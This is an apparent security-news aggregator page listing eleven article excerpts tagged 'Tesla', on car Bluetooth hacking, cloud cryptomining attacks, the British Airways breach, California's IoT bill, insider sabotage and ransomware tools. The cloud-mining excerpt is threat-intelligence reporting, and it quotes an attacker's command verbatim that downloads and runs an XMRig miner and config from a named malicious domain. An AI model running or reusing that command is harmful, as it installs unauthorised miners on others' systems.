What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2019-05-21 20:30:01 | Car Manufacturers Be Aware – Bluetooth Module Could Lead To Vehicle Shut Down By Hackers (lien direct) | According to new research uncovered by security specialists, Pen Test Partners, who were investigating the systems within Tesla vehicles, found that if hackers could attach an ELM327 Bluetooth module to the interface, they would have the ability to analyse the traffic and read CAN messages. If left in, a hacker could also potentially shut the car down. Experts Comments: Martin Jartelius, … The ISBuzz Post: This Post Car Manufacturers Be Aware – Bluetooth Module Could Lead To Vehicle Shut Down By Hackers | Guideline | Tesla | |
 |
2019-03-14 14:55:00 | Making it Rain - Cryptocurrency Mining Attacks in the Cloud (lien direct) | By Chris Doman and Tom Hegel Organizations of all sizes have made considerable shifts to using cloud-based infrastructure for their day-to-day business operations. However, cloud security hasn't always kept up with cloud adoption, and that leaves security gaps that hackers are more than happy to take advantage of. One of the most widely observed objectives of attacking an organization's cloud infrastructure has been for cryptocurrency mining. Despite recent falls in cryptocurrency prices, mining campaigns continue to plague organizations. Below, we've shared some of the more noteworthy forms of attack where the hackers’ end objective is to use your cloud infrastructure to mine cryptocurrency. Compromised Container Management Platforms We've seen attackers using open APIs and unauthenticated management interfaces to compromise container management platforms. We recently investigated attacks involving mining malware served from the domain xaxaxa[.]eu. That domain may sound familiar, as it appeared in a February 2018 report by RedLock on the compromise of the Kubernetes infrastructure of an electric car company. The report details the container commands showing the malicious request. RedLock reported the attackers used the compromised Kubernetes server in Amazon Web Services to mine Monero and potentially access customer data. In the event of such unrestricted access, cryptocurrency mining is one of the least malicious outcomes to victim organizations. For example, customer data and business operations could be at risk for theft or malicious modification. Following the attention of the report by RedLock, the owners of xaxaxa[.]eu published a Public Notice stating that they are just a mining proxy and are not responsible for any malicious activity themselves. Notably, we have also observed the domain serving pages saying it is a Dynamic Domain and a Vesta Control Panel. However, we have seen from other attacks listed in this article that the root domain is actively involved in serving malware and implicated in other campaigns. Control Panel Exploitation We have also observed attacks aimed at the control panels of web hosting solutions. The impact is similar to the previous topics, essentially allowing administrative control over web services for the execution of malicious code. In April 2018, the same attackers that compromised Kubernetes infrastructure started exploiting an unknown vulnerability in VestaCP. This was followed by frantic posts on the official VestaCP forums and those of web-hosts that run VestaCP. VestaCP users provided details on how their installations were compromised. In these attacks, they added a new backdoor user called “sysroot,” and then downloaded and installed the XMRig application to mine Monero cryptocurrency. pkill -f xmrig; wget -O /tmp/gcc http://xaxaxa[.]eu/gcc; chmod +x gcc; wget -O /tmp/config_1.json http://xaxaxa[.]eu/config_1.json; /tmp/gcc -c /tmp/config_1.json; Lastly, the | Guideline | Uber Tesla | |
 |
2018-12-13 11:00:00 | Dr. Elon & Mr. Musk: Life Inside Tesla\'s Production Hell (lien direct) | Unfettered genius. Unpredictable rages. Here's what it was like to work at Tesla as Model 3 manufacturing ramped up and the company's leader melted down. | Guideline | Tesla | |
|
2018-09-14 13:00:00 | Things I Hearted this Week, 14th September 2018 (lien direct) |
With everything that keeps going on in the world of security, and the world at large, most eyes were focused on Tim Cook as he and his merry men took to the stage and announce the latest and greatest in Apple technology.
There didn’t seem to be anything totally mind-blowing on the phone end. Just looked to be more bigger, faster, and powerful versions of the iPhones at eye-watering prices.
The Apple watch now has a built-in FDA-approved ECG heart monitor. Which is pretty cool as an early-warning system that a stroke is imminent - I assume to allow you to take some smart HDR selfies, apply the correct filters, and post to Instagram before you collapse.
But enough about that, let’s get down to business.
British Airways Breached
BA suffered a rather large breach which included payment information (including CVV) and personal details.
While the investigation is ongoing, some security experts believe the breach was caused due to malicious code being injected into one of the external scripts in its payment systems.
British Airways hack: Infosec experts finger third-party scripts on payment pages | The Register
As an affected customer, I accept that companies get breached. But the advice seemed pretty poor.
British Airways breached | J4vv4D
Boards need to get more technical - NCSC
The government is calling on business leaders to take responsibility for their organisations’ cyber security, as the threat from nation state hackers and cyber criminal gangs continues to rise. Ciaran Martin, head of NCSC believes that cybersecurity is a mainstream business risk and that corporate leaders need to understand what threats are out there, and what are the most effective ways of managing the risks. They need to understand cyber risk in the same way they understand financial risk, or health and safety risk.
NCSC issues new advice for business leaders as Ciaran Martin admits previous guidance was “unhelpful” | New Statesman
Hunting in O365 logs
Cloud is great, but sometimes making sense of the logs can be a pain. If you’re struggling with O365 logs, then this document could be really useful.
Detailed properties in the Office 365 audit log | Microsoft
GCHQ data collection violated human rights, Strasbourg court rules
GCHQ’s methods in carrying out bulk interception of online communications violated privacy and failed to provide sufficient surveillance safeguards, the European court of human rights has ruled in a test case judgment.
But the Strasbourg court found that GCHQ’s regime for sharing sensitive digital intelligence with foreign governments was not illegal.
It is the first major challenge to the legality of UK intelligence agencies intercepting private communications in bulk, following Edward Snowden’s whistleblowing revelations.
GCHQ data collection violated human rights, Strasbourg court r |
Data Breach Threat Guideline | Tesla | |
 |
2018-09-10 17:33:17 | California\'s bad IoT law (lien direct) | California has passed an IoT security bill, awaiting the government's signature/veto. It's a typically bad bill based on a superficial understanding of cybersecurity/hacking that will do little improve security, while doing a lot to impose costs and harm innovation.It's based on the misconception of adding security features. It's like dieting, where people insist you should eat more kale, which does little to address the problem you are pigging out on potato chips. The key to dieting is not eating more but eating less. The same is true of cybersecurity, where the point is not to add “security features” but to remove “insecure features”. For IoT devices, that means removing listening ports and cross-site/injection issues in web management. Adding features is typical “magic pill” or “silver bullet” thinking that we spend much of our time in infosec fighting against.We don't want arbitrary features like firewall and anti-virus added to these products. It'll just increase the attack surface making things worse. The one possible exception to this is “patchability”: some IoT devices can't be patched, and that is a problem. But even here, it's complicated. Even if IoT devices are patchable in theory there is no guarantee vendors will supply such patches, or worse, that users will apply them. Users overwhelmingly forget about devices once they are installed. These devices aren't like phones/laptops which notify users about patching.You might think a good solution to this is automated patching, but only if you ignore history. Many rate “NotPetya” as the worst, most costly, cyberattack ever. That was launched by subverting an automated patch. Most IoT devices exist behind firewalls, and are thus very difficult to hack. Automated patching gets beyond firewalls; it makes it much more likely mass infections will result from hackers targeting the vendor. The Mirai worm infected fewer than 200,000 devices. A hack of a tiny IoT vendor can gain control of more devices than that in one fell swoop.The bill does target one insecure feature that should be removed: hardcoded passwords. But they get the language wrong. A device doesn't have a single password, but many things that may or may not be called passwords. A typical IoT device has one system for creating accounts on the web management interface, a wholly separate authentication system for services like Telnet (based on /etc/passwd), and yet a wholly separate system for things like debugging interfaces. Just because a device does the proscribed thing of using a unique or user generated password in the user interface doesn't mean it doesn't also have a bug in Telnet.That was the problem with devices infected by Mirai. The description that these were hardcoded passwords is only a superficial understanding of the problem. The real problem was that there were different authentication systems in the web interface and in other services like Telnet. Most of the devices vulnerable to Mirai did the right thing on the web interfaces (meeting the language of this law) requiring the user to create new passwords before operating. They just did the wrong thing elsewhere.People aren't really paying attention to what happened with Mirai. They look at the 20 billion new IoT devices that are going to be connected to the Internet by 2020 and believe Mirai is just the tip of the iceberg. But it isn't. The IPv4 Internet has only 4 billion addresses, which are pretty much already used up. This means those 20 billion won't be exposed to the public Internet like Mirai devices, but hidden behind firewalls that translate addresses. Thus, rather than Mirai presaging the future, it represents the last gasp of the past that is unlikely to come again.This law is backwards looking rather than forward looking. Forward looking, by far the most important t | Hack Threat Patching Guideline | NotPetya Tesla | |
|
2018-06-22 13:00:00 | Things I Hearted this Week, 22nd June 2018 (lien direct) |
The Tesla Insider
Elon Musk sent out an email stating an employee had stabbed the company in the back like Brutus, changing production code, and leaking inside information. I'll admit that like many people who have talked about or written about insider threats in the past, I instinctively punched the air and yelled, "YES! I warned you but you didn't listen."
The incident is also notable for the impact it had on the company's share price which dropped more than 6% in trading.
"I was dismayed to learn this weekend about a Tesla employee who had conducted quite extensive and damaging sabotage to our operations, this included making direct code changes to the Tesla Manufacturing Operating System under false usernames and exporting large amounts of highly sensitive Tesla data to unknown third parties."
Insider threats defined | AlienVault
Tesla hit by insider saboteur who changed code, exfiltrated data | SC Magazine
Tesla sinks after Elon Musk says an employee conducted 'sabotage' and Trump ramps up fears of a trade war (TSLA) | Business Insider
Can't Fix Won't Fix, Don't Fix
Organisations cannot afford to view penetration testing as a tick box exercise. How should they mitigate the fact some vulnerabilities can’t be fixed, won’t be fixed, and in some instances, actually shouldn’t be fixed?
Can’t fix, won’t fix, don’t fix: Is it time for businesses to rethink how they action pen test results?| IT Pro Portal
On the topic of pen tests, check out Adrian Sanabria's presentation slides from RSA earlier this year on killing the pen test.
It's time to kill the pen test (PDF) | RSAconference
To add balance, and to convince you pen testers out there that I'm not a bad person who hates all pen testers, here's an awesome collection of penetration testing resources that include tools, online resources, books, courses, conferences, magazine...
Awesome Penetration Testing | Kinimiwar, GitHub
A Case Study In Bad Disclosure
Imagine you're a researcher and have found a vulnerability, you then disclose it responsibly to a vendor, then that vendor fixes the issue - but instead of sending the chopper over to you with a care package, they pretend like you didn't exist. Akin to Tom Cruise getting disavowed in every single Mission Impossible movie.
Then imagine that vendor submitted the vulnerability details to Google and received a bug bounty award to the tune of $5,000.
Then to top it off, they sat back in a massive reclining chair, threw their head back and laughed as they donated the full $5,000 to a good cause.
|
Hack Vulnerability Guideline | Bithumb Tesla Tesla | |
 |
2017-09-22 16:01:52 | EITest Campaign Uses Tech Support Scams to Deliver Coinhive\'s Monero Miner (lien direct) | We've uncovered the notorious EITest campaign delivering a JavaScript (JS) cryptocurrency miner (detected by Trend Micro as HKTL_COINMINE) using tech support scams as a social engineering lure. These are fraud activities impersonating legitimate technical support services, conning unwitting victims to avail/pay for these services (or hand out financial data), by scaring them that their machine has been infected with malware, for instance. The EITest campaign's main arsenal is compromised websites. Its activity can be traced to as early as 2014 and once used the Angler exploit kit to deliver ransomware. Starting January 2017, it has eschewed exploit kits in favor of “HoeflerText†(a popular font) phishing attacks or  . In a month, we identified 990 compromised websites injected with a malicious script that diverts the would-be victim to a website related to the tech support scam. Of late, though, the campaign has added the Coinhive JS miner into ongoing attacks, turning the victim's computer into a Monero cryptocurrency miner. Analysis also revealed that this JS cryptocurrency miner is the same “Coinhive†JS miner found embedded in The Pirate Bay's website. Post from: Trendlabs Security Intelligence Blog - by Trend Micro EITest Campaign Uses Tech Support Scams to Deliver Coinhive's Monero Miner | Guideline | Tesla | |
|
2017-05-12 02:51:43 | Some notes on Trump\'s cybersecurity Executive Order (lien direct) | President Trump has finally signed an executive order on "cybersecurity". The first draft during his first weeks in power were hilariously ignorant. The current draft, though, is pretty reasonable as such things go. I'm just reading the plain language of the draft as a cybersecurity expert, picking out the bits that interest me. In reality, there's probably all sorts of politics in the background that I'm missing, so I may be wildly off-base.Holding managers accountableThis is a great idea in theory. But government heads are rarely accountable for anything, so it's hard to see if they'll have the nerve to implement this in practice. When the next breech happens, we'll see if anybody gets fired."antiquated and difficult to defend Information Technology"The government uses laughably old computers sometimes. Forces in government wants to upgrade them. This won't work. Instead of replacing old computers, the budget will simply be used to add new computers. The old computers will still stick around."Legacy" is a problem that money can't solve. Programmers know how to build small things, but not big things. Everything starts out small, then becomes big gradually over time through constant small additions. What you have now is big legacy systems. Attempts to replace a big system with a built-from-scratch big system will fail, because engineers don't know how to build big systems. This will suck down any amount of budget you have with failed multi-million dollar projects.It's not the antiquated systems that are usually the problem, but more modern systems. Antiquated systems can usually be protected by simply sticking a firewall or proxy in front of them."address immediate unmet budgetary needs necessary to manage risk"Nobody cares about cybersecurity. Instead, it's a thing people exploit in order to increase their budget. Instead of doing the best security with the budget they have, they insist they can't secure the network without more money.An alternate way to address gaps in cybersecurity is instead to do less. Reduce exposure to the web, provide fewer services, reduce functionality of desktop computers, and so on. Insisting that more money is the only way to address unmet needs is the strategy of the incompetent.Use the NIST frameworkProbably the biggest thing in the EO is that it forces everyone to use the NIST cybersecurity framework.The NIST Framework simply documents all the things that organizations commonly do to secure themselves, such run intrusion-detection systems or impose rules for good passwords.There are two problems with the NIST Framework. The first is that no organization does all the things listed. The second is that many organizations don't do the things well.Password rules are a good example. Organizations typically had bad rules, such as frequent changes and complexity standards. So the NIST Framework documented them. But cybersecurity experts have long opposed those complex rules, so have been fighting NIST on them.Another good example is intrusion-detection. These days, I scan the entire Internet, setting off everyone's intrusion-detection systems. I can see first hand that they are doing intrusion-detection wrong. But the NIST Framework recommends they do it, because many organizations do it, but the NIST Framework doesn't demand they do it well.When this EO forces everyone to follow the NIST Framework, then, it's likely just going to i | Guideline | Yahoo Tesla | |
|
2017-02-06 10:37:34 | Lurk: Retracing the Group\'s Five-Year Campaign (lien direct) | Fileless infections are exactly what their namesake says: they're infections that don't involve malicious files being downloaded or written to the system's disk. While fileless infections are not necessarily new or rare, it presents a serious threat to enterprises and end users given its capability to gain privileges and persist in the system of interest to an attacker-all while staying under the radar. For instance, fileless infections have been incorporated in a targeted bot delivery, leveraged to deliver ransomware, infect point-of-sale (PoS) systems, and perpetrate click fraud. The key point of the fileless infection for the attacker is to be able to evaluate each compromised system and make a decision whether the infection process should continue or vanish without a trace. The cybercriminal group Lurk was one of the first to effectively employ fileless infection techniques in large-scale attacks-techniques that arguably became staples for other malefactors. Post from: Trendlabs Security Intelligence Blog - by Trend Micro Lurk: Retracing the Group's Five-Year Campaign | Guideline | Tesla | |
 |
2016-09-27 04:24:00 | After Tesla: why cybersecurity is central to the car industry\'s future (lien direct) | The news that a Tesla car was hacked from 12 miles away tells us that the explosive growth in automotive connectivity may be rapidly outpacing automotive security.This story is illustrative of two persistent problems afflicting many connected industries: the continuing proliferation of vulnerabilities in new software, and the misguided view that cybersecurity is separate from concept, design, engineering and production.This leads to a 'fire brigade approach' to cybersecurity where security is not baked in at the design stage for either hardware or software but added in after vulnerabilities are discovered by cybersecurity specialists once the product is already on the market.To read this article in full or to leave a comment, please click here | Guideline | Tesla | |
|
2016-05-26 10:34:37 | Say No to Ransomware With These Trend Micro Free Tools (lien direct) | Trend Micro has released free tools--Trend Micro Crypto-Ransomware File Decryptor Tool and Trend Micro Lock Screen Ransomware Tool--to help users and organizations fight back against the dangers that ransomware pose. Systems affected with certain crypto-ransomware variants like TeslaCrypt and CryptXXX can use the File Decryptor Tool to retrieve their files that were 'held hostage' by these threats. If your system is infected with ransomware that has a lock-screen feature, our Lock Screen Ransomware Tool will help users gain access to their screen even though the malware is blocking normal and safe mode with networking. One of the primary goals of these tools is to prevent affected users and businesses from succumbing to the pressure and the demands of paying the ransom just to retrieve their confidential data.Post from: Trendlabs Security Intelligence Blog - by Trend MicroSay No to Ransomware With These Trend Micro Free Tools | Guideline | Tesla | ★★★★★ |
1
We have: 11 articles.
We have: 11 articles.
To see everything:
Our RSS (filtrered)
